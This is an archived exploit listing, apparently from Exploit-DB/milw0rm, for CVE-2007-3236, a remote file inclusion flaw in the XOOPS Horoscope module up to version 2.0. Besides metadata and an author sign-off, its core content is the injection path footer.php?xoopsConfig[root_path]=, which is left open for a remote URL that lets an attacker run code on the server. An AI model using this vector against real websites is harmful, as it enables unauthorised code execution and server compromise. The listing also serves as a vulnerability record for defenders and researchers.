xoops module horoscope <= 2.0 - Remote File Inclusion Vulnerability

2007-06-12T00:00:00
ID EDB-ID:4064
Type exploitdb
Reporter BeyazKurt
Modified 2007-06-12T00:00:00

Description

XOOPS Module Horoscope <= 2.0 Remote File Inclusion Vulnerability. CVE-2007-3236. Webapps exploit for php platform

                                        
                                            BeyazKurt - B3yazKurt@Hotmail.Com

XOOPS Modules Horoscope

http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162

modules/horoscope/footer.php?xoopsConfig[root_path]=

{NetLife Since : '2003-4'}

Emekli Heykır BeyazKurt - Neti bıraktım! Dönüşüm mükemmel olcak ;(

# milw0rm.com [2007-06-12]